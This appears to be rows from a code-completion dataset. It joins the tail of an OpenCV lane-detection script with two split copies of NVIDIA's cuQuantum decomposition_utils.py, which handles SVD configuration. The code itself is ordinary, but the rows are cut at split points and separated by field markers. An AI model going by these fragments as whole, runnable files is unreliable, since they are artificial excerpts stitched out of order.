img_undist = cv2.undistort(image,mtx,dst,None,mtx)
final_img = np.copy(img_undist)
#final_img = equalize(final_img)
#cv2.imwrite('D:/Self Driving Car Engineer/Course 4/SampleImages/'+str(image_no)+'.jpg',final_img)
#image_no+=1
gradx = abs_sobel_thresh(img_undist, orient='x', sobel_kernel=ksize, thresh=(52, 238))
grady = abs_sobel_thresh(img_undist, orient='y', sobel_kernel=ksize, thresh=(59, 249))
mag_binary = mag_thresh(img_undist, sobel_kernel=ksize, mag_thresh=(68, 255))
dir_binary = dir_threshold(img_undist, sobel_kernel=ksize, thresh=(0.02, 1.57))
#s_binary = hls_select(img_undist,thresh=(212,255)) #98-255 works even in brighter areas
s_binary = hls_select(img_undist,thresh=(151,255)) #151
luminiscence = yuv_select_lumin(img_undist,thresh=(14,255))
combined = np.zeros_like(dir_binary)
combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1)) |(s_binary == 1)&(luminiscence==1)] = 1
#top left,bottom left,bottom right,top right
src = np.float32([[585-20, 460+10],[203-20, 720],[1127+30, 720],[695+30, 460+10]])
#src = np.float32([[620, 460-30],[203, 720],[1127, 720],[660, 460-30]])
points = np.int32(np.copy(src))
# cv2.polylines(img_undist,[points] ,True,(0,0,255),5)
#** Key here is keep the destination top boundary as closer as possible for effective transform**
dst = np.array([[320-20, 0],[320-20, 720],[960+30, 720],[960+30, 0]],dtype='float32')
img_size=(combined.shape[1],combined.shape[0])
M = cv2.getPerspectiveTransform(src,dst)
Minv = cv2.getPerspectiveTransform(dst,src)
warped = cv2.warpPerspective(combined,M,img_size,flags=cv2.INTER_LINEAR)
#Testing
output4 = np.dstack([warped*255,warped*255,warped*255])
output4 = cv2.resize(output4,(320, 180), interpolation = cv2.INTER_AREA)
#Testing ends
output3 = cv2.warpPerspective(final_img,M,img_size,flags=cv2.INTER_LINEAR)
output3 = cv2.resize(output3,(320, 180), interpolation = cv2.INTER_AREA)
#Testing
#cv2.imshow('warped',warped*255)
kernel = np.ones((320, 1),np.uint8)
warped1 = cv2.morphologyEx(warped.astype(np.uint8), cv2.MORPH_DILATE, kernel, iterations = 1)
warped = cv2.morphologyEx(warped1.astype(np.uint8), cv2.MORPH_ERODE, kernel, iterations = 1)
#cv2.imshow('warped1',warped*255)
#Testing ends
if((len(left_fit)==0 or len(right_fit)==0) or count==100 or validation_fails>5):
histogram_img,leftx,lefty,rightx,righty,out_img = hist(warped,left_fit,right_fit,True)
count=0
validation_fails = 0
else:
histogram_img,leftx,lefty,rightx,righty,out_img = hist(warped,left_fit,right_fit,False)
if(len(leftx)==0 or len(rightx)==0):
histogram_img,leftx,lefty,rightx,righty,out_img = hist(warped,left_fit,right_fit,True)
count=0
ploty = np.linspace(0,warped.shape[0]-1,warped.shape[0])
left_fit = np.polyfit(lefty,leftx,2)
right_fit = np.polyfit(righty,rightx,2)
#Testing
t2 = right_fit[2]/left_fit[2]
t1 = right_fit[1]/left_fit[1]
t0 = right_fit[0]/left_fit[0]
#print(t2,t1,t0)
if(abs(t2) >20 or abs(t1)>20 or abs(t0)>20):
validation_fails+=1
if(len(prev_left_fit)!=0):
left_fit = prev_left_fit
if(len(prev_right_fit)!=0):
right_fit = prev_right_fit
print('valid fails')
prev_left_fit = np.copy(left_fit)
prev_right_fit = np.copy(right_fit)
#Testing ends
try:
leftfitx = left_fit[0]*ploty**2 + left_fit[1]*ploty+left_fit[2]
rightfitx = right_fit[0]*ploty**2+right_fit[1]*ploty+right_fit[2]
except TypeError:
print('The function failed to fit a line!')
final_out_img = np.copy(out_img).astype(np.uint8)
#testing
out_img[lefty,leftx] = [255,0,0]
out_img[righty,rightx] = [0,0,255]
#output4 = cv2.resize(out_img,(320, 180), interpolation = cv2.INTER_AREA)
#testing ends
leftpoints_draw = (np.asarray([leftfitx,ploty]).T).astype(np.int32)
rightpoints_draw = (np.asarray([rightfitx,ploty]).T).astype(np.int32)
#testing
# width = abs(np.max(leftpoints_draw) - np.max(rightpoints_draw))
# print(width)
cv2.polylines(out_img,[leftpoints_draw],False,(0,255,255),3)
cv2.polylines(out_img,[rightpoints_draw],False,(0,255,255),3)
#testing ends
#**Drwaing on image the lane**
pts_left = np.array([np.transpose(np.vstack([leftfitx, ploty]))])
pts_right = np.array([np.flipud(np.transpose(np.vstack([rightfitx, ploty])))])
#flipud is just reversing the order of the points which are from top to bottom to make them bottom to top so that we can have an anticlockwise ordering of the corners.
pts = np.hstack((pts_left, pts_right))
#print(pts.shape)
#Testing
left_side_points_mean = np.mean(pts_left)
right_side_points_mean = np.mean(pts_right)
#Testing ends
#**Measuring Curvature radius**
y_eval = np.max(ploty)
ym_per_pixel = 30/720 #meters per pixel in y dimension
xm_per_pixel = 3.7/700 #meters per pixel in x dimension
#Testing
left_fit_0_metres = left_fit[0] * (xm_per_pixel / (ym_per_pixel**2))
left_fit_1_metres = left_fit[1] * (xm_per_pixel / ym_per_pixel)
right_fit_0_metres = right_fit[0] * (xm_per_pixel / (ym_per_pixel**2))
right_fit_1_metres = right_fit[1] * (xm_per_pixel / ym_per_pixel)
#Testing ends
left_curved = ((1 + (2*left_fit_0_metres*y_eval*ym_per_pixel + left_fit_1_metres)**2)**1.5)/(np.absolute(2*left_fit_0_metres))
right_curved = ((1 + (2*right_fit_0_metres*y_eval*ym_per_pixel + right_fit_1_metres)**2)**1.5)/(np.absolute(2*right_fit_0_metres))
#print('left_curved: '+str(left_curved))
#print('right_curved: '+str(right_curved))
#testing
output2 = cv2.resize(out_img,(320, 180), interpolation = cv2.INTER_AREA)
#testing ends
cv2.fillPoly(final_out_img,np.int_([pts]),(0,255,0))
#cv2.imwrite('./test_images/test.jpg',combined*255)
newwarp = cv2.warpPerspective(final_out_img, Minv, (image.shape[1], image.shape[0]))
result = cv2.addWeighted(final_img, 1, newwarp, 0.3, 0)
vis = np.zeros((720, 1280 ,3),dtype=np.uint8)
vis[:720, :1280,:] = result
ltext = "left Curvature(m): " + str(round(left_curved,3))
rtext = "right Curvature(m): " + str(round(right_curved,3))
cent_out = round((left_side_points_mean + right_side_points_mean)/2,3)
distance_from_center = round(abs(img_size[0]/2 - cent_out)*xm_per_pixel,3)
cent = "Vehicle is left from center(m): " + str(distance_from_center)
cv2.putText(result,ltext,(200,100),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
cv2.putText(result,rtext,(750,100),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
cv2.putText(result,cent,(350,200),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
#cv2.imshow('result',result)
output1 = cv2.resize(combined*255,(320, 180), interpolation = cv2.INTER_AREA)
vis[:180, 0:320,:] = np.dstack([output1,output1,output1])
vis[:180, 320:640,:] = output2
vis[:180, 640:960,:] = output3
vis[:180, 960:1280,:] = output4
cv2.putText(vis,ltext,(200,210),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
cv2.putText(vis,rtext,(750,210),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
cv2.putText(vis,cent,(350,250),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
cv2.imshow('result',vis)
result1.write(result)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
break
cap.release()
result1.release()
cv2.destroyAllWindows() | mag_thresh | identifier_name |
decomposition_utils.py | # Copyright (c) 2023, NVIDIA CORPORATION & AFFILIATES
#
# SPDX-License-Identifier: BSD-3-Clause
"""
A collection of utility functions for decomposition.
"""
import logging
import numpy
from . import einsum_parser
from . import formatters
from . import tensor_wrapper
from . import typemaps
from . import utils
from .. import cutensornet as cutn
from .. import memory
DECOMPOSITION_DTYPE_NAMES = ('float32', 'float64', 'complex64', 'complex128')
#TODO: auto generate the maps below
PARTITION_MAP = {None: cutn.TensorSVDPartition.NONE,
'U': cutn.TensorSVDPartition.US,
'V': cutn.TensorSVDPartition.SV,
'UV': cutn.TensorSVDPartition.UV_EQUAL}
NORMALIZATION_MAP = {None: cutn.TensorSVDNormalization.NONE,
'L1': cutn.TensorSVDNormalization.L1,
'L2': cutn.TensorSVDNormalization.L2,
'LInf': cutn.TensorSVDNormalization.LINF}
SVD_ALGORITHM_MAP = {'gesvd': cutn.TensorSVDAlgo.GESVD,
'gesvdj': cutn.TensorSVDAlgo.GESVDJ,
'gesvdp': cutn.TensorSVDAlgo.GESVDP,
'gesvdr': cutn.TensorSVDAlgo.GESVDR}
SVD_ALGORITHM_MAP_TO_STRING = dict((val, key) for key, val in SVD_ALGORITHM_MAP.items())
SVD_METHOD_CONFIG_MAP = {'abs_cutoff': cutn.TensorSVDConfigAttribute.ABS_CUTOFF,
'rel_cutoff': cutn.TensorSVDConfigAttribute.REL_CUTOFF,
'partition': cutn.TensorSVDConfigAttribute.S_PARTITION,
'normalization': cutn.TensorSVDConfigAttribute.S_NORMALIZATION,
'algorithm': cutn.TensorSVDConfigAttribute.ALGO}
SVD_INFO_MAP = {'full_extent': cutn.TensorSVDInfoAttribute.FULL_EXTENT,
'reduced_extent': cutn.TensorSVDInfoAttribute.REDUCED_EXTENT,
'discarded_weight': cutn.TensorSVDInfoAttribute.DISCARDED_WEIGHT,
'algorithm': cutn.TensorSVDInfoAttribute.ALGO}
def compute_combined_size(size_dict, modes):
"""
Given the modes, compute the product of all extents using information in size_dict.
"""
size = 1
for mode in modes:
size *= size_dict[mode]
return size
def parse_decomposition_subscripts(subscripts): | Parse decomposition expression in string format, retaining ellipses if present.
"""
input_modes, *output_modes = subscripts.split("->")
if not output_modes:
raise ValueError("Output modes must be explicitly specified for decomposition")
if len(output_modes) > 1:
raise ValueError("subscripts must contain only 1 ->")
input_modes = input_modes.split(",")
output_modes = output_modes[0].split(",")
if len(output_modes) != 2:
raise ValueError("subscripts must specify the modes for both left and right tensors")
return input_modes, output_modes
def compute_mid_extent(size_dict, inputs, outputs):
"""
Compute the expected mid extent given a size_dict and the modes for both inputs and outputs.
"""
size_dict = size_dict.copy() # this func will modify it in place
left_output = set(outputs[0])
right_output = set(outputs[1])
shared_mode_out = set(left_output) & set(right_output)
if len(shared_mode_out) !=1:
raise ValueError(f"Expect one shared mode in the output tensors, found {len(shared_mode_out)}")
left_output -= shared_mode_out
right_output -= shared_mode_out
for _input in inputs:
left_extent = right_extent = remaining_extent = 1
left_modes = set()
right_modes = set()
for mode in _input:
extent = size_dict[mode]
if mode in left_output:
left_extent *= extent
left_modes.add(mode)
elif mode in right_output:
right_extent *= extent
right_modes.add(mode)
else:
remaining_extent *= extent
if right_extent * remaining_extent < left_extent:
# update left modes
left_mode_collapsed = left_modes.pop()
size_dict[left_mode_collapsed] = right_extent * remaining_extent
left_output -= left_modes
elif left_extent * remaining_extent < right_extent:
# update right modes
right_mode_collapsed = right_modes.pop()
size_dict[right_mode_collapsed] = left_extent * remaining_extent
right_output -= right_modes
left_extent = compute_combined_size(size_dict, left_output)
right_extent = compute_combined_size(size_dict, right_output)
return min(left_extent, right_extent)
def parse_decomposition(subscripts, *operands):
"""
Parse the generalized decomposition expression in string formats (unicode strings supported).
The modes for the outputs must be specified.
Returns wrapped operands, mapped inputs and output, size dictionary based on internal mode numbers,
the forward as well as the reverse mode maps, and the largest mid extent expected for the decomposition.
"""
inputs, outputs = parse_decomposition_subscripts(subscripts)
num_operand, num_input = len(operands), len(inputs)
if num_operand != num_input:
message = f"""Operand-term mismatch. The number of operands ({num_operand}) must match the number of inputs ({num_input}) specified in the decomposition expression."""
raise ValueError(message)
morpher = einsum_parser.select_morpher(False)
# First wrap operands.
operands = tensor_wrapper.wrap_operands(operands)
inputs = list(einsum_parser.parse_single(_input) for _input in inputs)
outputs = list(einsum_parser.parse_single(_output) for _output in outputs)
ellipses_input = any(Ellipsis in _input for _input in inputs)
num_ellipses_output = sum(Ellipsis in _output for _output in outputs)
if num_ellipses_output > 1:
raise ValueError(f"Ellipses found in {num_ellipses_output} output terms, only allowed in one at most.")
if ellipses_input:
if num_input == 1 and num_ellipses_output == 0:
raise ValueError("tensor.decompose does not support reduction operations")
einsum_parser.check_ellipses(inputs+outputs, morpher)
else:
if num_ellipses_output != 0:
raise ValueError("Invalid ellipsis specification. The output terms contain ellipsis while none of the input terms do.")
einsum_parser.check_einsum_with_operands(inputs, operands, morpher)
# Map data to ordinals for cutensornet.
num_extra_labels = max(len(o.shape) for o in operands) if ellipses_input else 0
all_modes, _, mode_map_user_to_ord, mode_map_ord_to_user, label_end = einsum_parser.map_modes(inputs + outputs, None, num_extra_labels, morpher)
mapper = einsum_parser.ModeLabelMapper(mode_map_ord_to_user)
mapping_morpher = einsum_parser.select_morpher(False, mapper)
# Replace ellipses with concrete labels
if ellipses_input:
if num_input == 1:
# For tensor.decompose only
n = len(operands[0].shape) - (len(inputs[0]) -1)
else:
num_implicit_modes = set()
for i, o in enumerate(operands):
_input = all_modes[i]
if Ellipsis not in _input:
continue
n = len(o.shape) - (len(_input) - 1)
assert n >= 0, "Internal error"
num_implicit_modes.add(n)
if len(num_implicit_modes) != 1:
#NOTE: Although we can allow ellipsis denoting different number of modes,
# here we disable it due to limited use case if any and potential confusion due to implicit specification.
raise ValueError(f"Ellipsis for all operands must refer to equal number of modes, found {num_implicit_modes}")
n = num_implicit_modes.pop()
ellipses_modes = tuple(range(label_end-n, label_end))
for i, _modes in enumerate(all_modes):
if Ellipsis not in _modes:
continue
s = _modes.index(Ellipsis)
all_modes[i] = _modes[:s] + ellipses_modes + _modes[s+1:]
inputs = all_modes[:num_input]
outputs = all_modes[num_input:]
if num_input == 1:
contracted_modes_output = set(einsum_parser.infer_output_mode_labels(outputs))
if contracted_modes_output != set(inputs[0]):
raise ValueError("The contracted outcome from the right hand side of the expression does not match the input")
# Create mode-extent map based on internal mode numbers.
size_dict = einsum_parser.create_size_dict(inputs, operands)
# Compute the maximally allowed mid extent
mid_extent = compute_mid_extent(size_dict, inputs, outputs)
return operands, inputs, outputs, size_dict, mode_map_user_to_ord, mode_map_ord_to_user, mid_extent
def get_svd_config_info_scalar_attr(handle, obj_type, obj, attr, svd_algorithm=None):
"""
Get the data for given attribute of SVDConfig or SVDInfo.
"""
if obj_type == 'config':
if attr != cutn.TensorSVDConfigAttribute.ALGO_PARAMS:
dtype = cutn.tensor_svd_config_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDR):
return None
dtype = cutn.tensor_svd_algo_params_get_dtype(svd_algorithm)
getter = cutn.tensor_svd_config_get_attribute
elif obj_type == 'info':
if attr != cutn.TensorSVDInfoAttribute.ALGO_STATUS:
dtype = cutn.tensor_svd_info_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDP):
return None
dtype = cutn.tensor_svd_algo_status_get_dtype(svd_algorithm)
getter = cutn.tensor_svd_info_get_attribute
else:
raise ValueError("object type must be either config or info")
data = numpy.empty((1,), dtype=dtype)
getter(handle, obj, attr, data.ctypes.data, data.dtype.itemsize)
return data
def set_svd_config_scalar_attr(handle, obj, attr, data, svd_algorithm=None):
"""
Set the data for given attribute of SVDConfig.
"""
setter = cutn.tensor_svd_config_set_attribute
if attr != cutn.TensorSVDConfigAttribute.ALGO_PARAMS:
dtype = cutn.tensor_svd_config_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDR):
raise ValueError(f"Algorithm specific parameters not supported for {svd_algorithm}")
dtype = cutn.tensor_svd_algo_params_get_dtype(svd_algorithm)
if not isinstance(data, numpy.ndarray):
data = numpy.asarray(data, dtype=dtype)
setter(handle, obj, attr, data.ctypes.data, data.dtype.itemsize)
def parse_svd_config(handle, svd_config, svd_method, logger=None):
"""
Given an SVDMethod object, set the corresponding attributes in the SVDConfig.
"""
svd_algorithm = None
for method_attr, attr in SVD_METHOD_CONFIG_MAP.items():
data = getattr(svd_method, method_attr)
if method_attr == 'partition':
data = PARTITION_MAP[data]
elif method_attr == 'normalization':
data = NORMALIZATION_MAP[data]
elif method_attr == 'algorithm':
svd_algorithm = data = SVD_ALGORITHM_MAP[data]
set_svd_config_scalar_attr(handle, svd_config, attr, data)
if logger is not None:
logger.info(f"The SVDConfig attribute '{method_attr}' has been set to {data}.")
algo_params = svd_method._get_algo_params()
if algo_params is not None:
set_svd_config_scalar_attr(handle, svd_config, cutn.TensorSVDConfigAttribute.ALGO_PARAMS, algo_params, svd_algorithm=svd_algorithm)
if logger is not None:
logger.info(f"The SVDConfig attribute '{cutn.TensorSVDConfigAttribute.ALGO_PARAMS}' has been set to {algo_params}.")
def get_svd_info_dict(handle, svd_info):
"""
Parse the information in SVDInfo in a dictionary object.
"""
info = dict()
for key, attr in SVD_INFO_MAP.items():
info[key] = get_svd_config_info_scalar_attr(handle, 'info', svd_info, attr).item()
svd_algorithm = info['algorithm']
algo_status = get_svd_config_info_scalar_attr(handle, 'info', svd_info, cutn.TensorSVDInfoAttribute.ALGO_STATUS, svd_algorithm=svd_algorithm)
info['algorithm'] = SVD_ALGORITHM_MAP_TO_STRING[svd_algorithm]
if algo_status is not None:
for name in algo_status.dtype.names:
key = info['algorithm'] + f'_{name}'
info[key] = algo_status[name].item()
return info
def parse_decompose_operands_options(options, wrapped_operands, allowed_dtype_names=None):
"""
Given initially wrapped tensors and network options, wrap the operands to device and create an internal NetworkOptions object.
If cutensornet library handle is not provided in `options`, one will be created in the internal options.
"""
device_id = utils.get_network_device_id(wrapped_operands)
logger = logging.getLogger() if options.logger is None else options.logger
operands_location = 'cuda'
if device_id is None:
operands_location = 'cpu'
device_id = options.device_id
logger.info(f"Begin transferring input data from host to device {device_id}")
wrapped_operands = tensor_wrapper.to(wrapped_operands, device_id)
logger.info("Input data transfer finished")
# initialize handle once if not provided
if options.handle is not None:
own_handle = False
handle = options.handle
else:
own_handle = True
with utils.device_ctx(device_id):
handle = cutn.create()
dtype_name = utils.get_operands_dtype(wrapped_operands)
if allowed_dtype_names is not None and dtype_name not in allowed_dtype_names:
raise ValueError(f"dtype {dtype_name} not supported")
compute_type = options.compute_type if options.compute_type is not None else typemaps.NAME_TO_COMPUTE_TYPE[dtype_name]
package = utils.get_operands_package(wrapped_operands)
allocator = options.allocator if options.allocator is not None else memory._MEMORY_MANAGER[package](device_id, logger)
internal_options = options.__class__(device_id=device_id,
logger=logger,
handle=handle,
blocking=options.blocking,
compute_type=compute_type,
memory_limit=options.memory_limit,
allocator=allocator)
return wrapped_operands, internal_options, own_handle, operands_location
def allocate_and_set_workspace(handle, allocator, workspace_desc, pref, mem_space, workspace_kind, device_id, stream, stream_ctx, logger, task_name=''):
"""
Allocate and set the workspace in the workspace descriptor.
"""
workspace_size = cutn.workspace_get_memory_size(handle, workspace_desc, pref, mem_space, workspace_kind)
# Allocate and set workspace
if mem_space == cutn.Memspace.DEVICE:
with utils.device_ctx(device_id), stream_ctx:
try:
logger.debug(f"Allocating device memory for {task_name}")
workspace_ptr = allocator.memalloc(workspace_size)
except TypeError as e:
message = "The method 'memalloc' in the allocator object must conform to the interface in the "\
"'BaseCUDAMemoryManager' protocol."
raise TypeError(message) from e
logger.debug(f"Finished allocating device memory of size {formatters.MemoryStr(workspace_size)} for decomposition in the context of stream {stream}.")
device_ptr = utils.get_ptr_from_memory_pointer(workspace_ptr)
cutn.workspace_set_memory(handle, workspace_desc, mem_space, workspace_kind, device_ptr, workspace_size)
logger.debug(f"The workspace memory (device pointer = {device_ptr}) has been set in the workspace descriptor.")
return workspace_ptr
elif workspace_size != 0:
# host workspace
logger.debug(f"Allocating host memory for {task_name}")
workspace_host = numpy.empty(workspace_size, dtype=numpy.int8)
logger.debug(f"Finished allocating host memory of size {formatters.MemoryStr(workspace_size)} for decomposition.")
cutn.workspace_set_memory(handle, workspace_desc, mem_space, workspace_kind, workspace_host.ctypes.data, workspace_size)
logger.debug(f"The workspace memory (host pointer = {workspace_host.ctypes.data}) has been set in the workspace descriptor.")
return workspace_host
else:
return None
def _destroy_tensor_descriptors(desc_tensors):
for t in desc_tensors:
if t is not None:
cutn.destroy_tensor_descriptor(t)
def create_operands_and_descriptors(handle, wrapped_operands, size_dict, inputs, outputs, mid_extent, method, device_id, stream_ctx, logger):
"""
Create empty tensor operands and corresponding tensor descriptors for a decomposition problem.
"""
# Create input tensor descriptors, output operands and output tensor descriptors
output_class = wrapped_operands[0].__class__
dtype_name = wrapped_operands[0].dtype
# Compute extents for the outputs
shared_mode_out = list(set(outputs[0]) & set(outputs[1]))[0]
output_extents = [tuple(size_dict[m] if m != shared_mode_out else mid_extent for m in modes) for modes in outputs]
logger.debug("Creating input tensor descriptors.")
input_tensor_descriptors = []
output_tensor_descriptors = []
try:
for (t, modes) in zip(wrapped_operands, inputs):
input_tensor_descriptors.append(t.create_tensor_descriptor(handle, modes))
logger.debug("The input tensor descriptors have been created.")
# Create the output in the context of the current stream to work around a performance issue with CuPy's memory pool.
logger.debug("Beginning output tensors and descriptors creation...")
s = None
s_ptr = 0
output_operands = []
with utils.device_ctx(device_id):
for extent, tensor_modes in zip(output_extents, outputs):
operand = utils.create_empty_tensor(output_class, extent, dtype_name, device_id, stream_ctx)
output_operands.append(operand)
output_tensor_descriptors.append(operand.create_tensor_descriptor(handle, tensor_modes))
if hasattr(method, 'partition') and method.partition is None:
if dtype_name in ['float32', 'complex64']:
s_dtype_name = 'float32'
elif dtype_name in ['float64', 'complex128']:
s_dtype_name = 'float64'
else:
raise ValueError(f"{dtype_name} data type not supported")
s = utils.create_empty_tensor(output_class, (mid_extent, ), s_dtype_name, device_id, stream_ctx)
s_ptr = s.data_ptr
logger.debug("The output tensors and descriptors have been created.")
except:
_destroy_tensor_descriptors(input_tensor_descriptors)
_destroy_tensor_descriptors(output_tensor_descriptors)
raise
return input_tensor_descriptors, output_operands, output_tensor_descriptors, s, s_ptr
def get_return_operand_data(tensor, target_location):
"""
Given wrapped tensors, fetch the return operands based on target location.
"""
if tensor is None: # potentially for s
return tensor
if target_location == 'cpu':
return tensor.to('cpu')
else: # already on device
return tensor.tensor | """ | random_line_split |
decomposition_utils.py | # Copyright (c) 2023, NVIDIA CORPORATION & AFFILIATES
#
# SPDX-License-Identifier: BSD-3-Clause
"""
A collection of utility functions for decomposition.
"""
import logging
import numpy
from . import einsum_parser
from . import formatters
from . import tensor_wrapper
from . import typemaps
from . import utils
from .. import cutensornet as cutn
from .. import memory
DECOMPOSITION_DTYPE_NAMES = ('float32', 'float64', 'complex64', 'complex128')
#TODO: auto generate the maps below
PARTITION_MAP = {None: cutn.TensorSVDPartition.NONE,
'U': cutn.TensorSVDPartition.US,
'V': cutn.TensorSVDPartition.SV,
'UV': cutn.TensorSVDPartition.UV_EQUAL}
NORMALIZATION_MAP = {None: cutn.TensorSVDNormalization.NONE,
'L1': cutn.TensorSVDNormalization.L1,
'L2': cutn.TensorSVDNormalization.L2,
'LInf': cutn.TensorSVDNormalization.LINF}
SVD_ALGORITHM_MAP = {'gesvd': cutn.TensorSVDAlgo.GESVD,
'gesvdj': cutn.TensorSVDAlgo.GESVDJ,
'gesvdp': cutn.TensorSVDAlgo.GESVDP,
'gesvdr': cutn.TensorSVDAlgo.GESVDR}
SVD_ALGORITHM_MAP_TO_STRING = dict((val, key) for key, val in SVD_ALGORITHM_MAP.items())
SVD_METHOD_CONFIG_MAP = {'abs_cutoff': cutn.TensorSVDConfigAttribute.ABS_CUTOFF,
'rel_cutoff': cutn.TensorSVDConfigAttribute.REL_CUTOFF,
'partition': cutn.TensorSVDConfigAttribute.S_PARTITION,
'normalization': cutn.TensorSVDConfigAttribute.S_NORMALIZATION,
'algorithm': cutn.TensorSVDConfigAttribute.ALGO}
SVD_INFO_MAP = {'full_extent': cutn.TensorSVDInfoAttribute.FULL_EXTENT,
'reduced_extent': cutn.TensorSVDInfoAttribute.REDUCED_EXTENT,
'discarded_weight': cutn.TensorSVDInfoAttribute.DISCARDED_WEIGHT,
'algorithm': cutn.TensorSVDInfoAttribute.ALGO}
def compute_combined_size(size_dict, modes):
"""
Given the modes, compute the product of all extents using information in size_dict.
"""
size = 1
for mode in modes:
size *= size_dict[mode]
return size
def parse_decomposition_subscripts(subscripts):
"""
Parse decomposition expression in string format, retaining ellipses if present.
"""
input_modes, *output_modes = subscripts.split("->")
if not output_modes:
raise ValueError("Output modes must be explicitly specified for decomposition")
if len(output_modes) > 1:
raise ValueError("subscripts must contain only 1 ->")
input_modes = input_modes.split(",")
output_modes = output_modes[0].split(",")
if len(output_modes) != 2:
raise ValueError("subscripts must specify the modes for both left and right tensors")
return input_modes, output_modes
def compute_mid_extent(size_dict, inputs, outputs):
"""
Compute the expected mid extent given a size_dict and the modes for both inputs and outputs.
"""
size_dict = size_dict.copy() # this func will modify it in place
left_output = set(outputs[0])
right_output = set(outputs[1])
shared_mode_out = set(left_output) & set(right_output)
if len(shared_mode_out) !=1:
raise ValueError(f"Expect one shared mode in the output tensors, found {len(shared_mode_out)}")
left_output -= shared_mode_out
right_output -= shared_mode_out
for _input in inputs:
left_extent = right_extent = remaining_extent = 1
left_modes = set()
right_modes = set()
for mode in _input:
extent = size_dict[mode]
if mode in left_output:
left_extent *= extent
left_modes.add(mode)
elif mode in right_output:
right_extent *= extent
right_modes.add(mode)
else:
remaining_extent *= extent
if right_extent * remaining_extent < left_extent:
# update left modes
left_mode_collapsed = left_modes.pop()
size_dict[left_mode_collapsed] = right_extent * remaining_extent
left_output -= left_modes
elif left_extent * remaining_extent < right_extent:
# update right modes
right_mode_collapsed = right_modes.pop()
size_dict[right_mode_collapsed] = left_extent * remaining_extent
right_output -= right_modes
left_extent = compute_combined_size(size_dict, left_output)
right_extent = compute_combined_size(size_dict, right_output)
return min(left_extent, right_extent)
def parse_decomposition(subscripts, *operands):
"""
Parse the generalized decomposition expression in string formats (unicode strings supported).
The modes for the outputs must be specified.
Returns wrapped operands, mapped inputs and output, size dictionary based on internal mode numbers,
the forward as well as the reverse mode maps, and the largest mid extent expected for the decomposition.
"""
inputs, outputs = parse_decomposition_subscripts(subscripts)
num_operand, num_input = len(operands), len(inputs)
if num_operand != num_input:
message = f"""Operand-term mismatch. The number of operands ({num_operand}) must match the number of inputs ({num_input}) specified in the decomposition expression."""
raise ValueError(message)
morpher = einsum_parser.select_morpher(False)
# First wrap operands.
operands = tensor_wrapper.wrap_operands(operands)
inputs = list(einsum_parser.parse_single(_input) for _input in inputs)
outputs = list(einsum_parser.parse_single(_output) for _output in outputs)
ellipses_input = any(Ellipsis in _input for _input in inputs)
num_ellipses_output = sum(Ellipsis in _output for _output in outputs)
if num_ellipses_output > 1:
raise ValueError(f"Ellipses found in {num_ellipses_output} output terms, only allowed in one at most.")
if ellipses_input:
if num_input == 1 and num_ellipses_output == 0:
raise ValueError("tensor.decompose does not support reduction operations")
einsum_parser.check_ellipses(inputs+outputs, morpher)
else:
if num_ellipses_output != 0:
raise ValueError("Invalid ellipsis specification. The output terms contain ellipsis while none of the input terms do.")
einsum_parser.check_einsum_with_operands(inputs, operands, morpher)
# Map data to ordinals for cutensornet.
num_extra_labels = max(len(o.shape) for o in operands) if ellipses_input else 0
all_modes, _, mode_map_user_to_ord, mode_map_ord_to_user, label_end = einsum_parser.map_modes(inputs + outputs, None, num_extra_labels, morpher)
mapper = einsum_parser.ModeLabelMapper(mode_map_ord_to_user)
mapping_morpher = einsum_parser.select_morpher(False, mapper)
# Replace ellipses with concrete labels
if ellipses_input:
if num_input == 1:
# For tensor.decompose only
n = len(operands[0].shape) - (len(inputs[0]) -1)
else:
num_implicit_modes = set()
for i, o in enumerate(operands):
_input = all_modes[i]
if Ellipsis not in _input:
continue
n = len(o.shape) - (len(_input) - 1)
assert n >= 0, "Internal error"
num_implicit_modes.add(n)
if len(num_implicit_modes) != 1:
#NOTE: Although we can allow ellipsis denoting different number of modes,
# here we disable it due to limited use case if any and potential confusion due to implicit specification.
raise ValueError(f"Ellipsis for all operands must refer to equal number of modes, found {num_implicit_modes}")
n = num_implicit_modes.pop()
ellipses_modes = tuple(range(label_end-n, label_end))
for i, _modes in enumerate(all_modes):
if Ellipsis not in _modes:
continue
s = _modes.index(Ellipsis)
all_modes[i] = _modes[:s] + ellipses_modes + _modes[s+1:]
inputs = all_modes[:num_input]
outputs = all_modes[num_input:]
if num_input == 1:
contracted_modes_output = set(einsum_parser.infer_output_mode_labels(outputs))
if contracted_modes_output != set(inputs[0]):
raise ValueError("The contracted outcome from the right hand side of the expression does not match the input")
# Create mode-extent map based on internal mode numbers.
size_dict = einsum_parser.create_size_dict(inputs, operands)
# Compute the maximally allowed mid extent
mid_extent = compute_mid_extent(size_dict, inputs, outputs)
return operands, inputs, outputs, size_dict, mode_map_user_to_ord, mode_map_ord_to_user, mid_extent
def get_svd_config_info_scalar_attr(handle, obj_type, obj, attr, svd_algorithm=None):
"""
Get the data for given attribute of SVDConfig or SVDInfo.
"""
if obj_type == 'config':
if attr != cutn.TensorSVDConfigAttribute.ALGO_PARAMS:
dtype = cutn.tensor_svd_config_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDR):
return None
dtype = cutn.tensor_svd_algo_params_get_dtype(svd_algorithm)
getter = cutn.tensor_svd_config_get_attribute
elif obj_type == 'info':
if attr != cutn.TensorSVDInfoAttribute.ALGO_STATUS:
dtype = cutn.tensor_svd_info_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDP):
return None
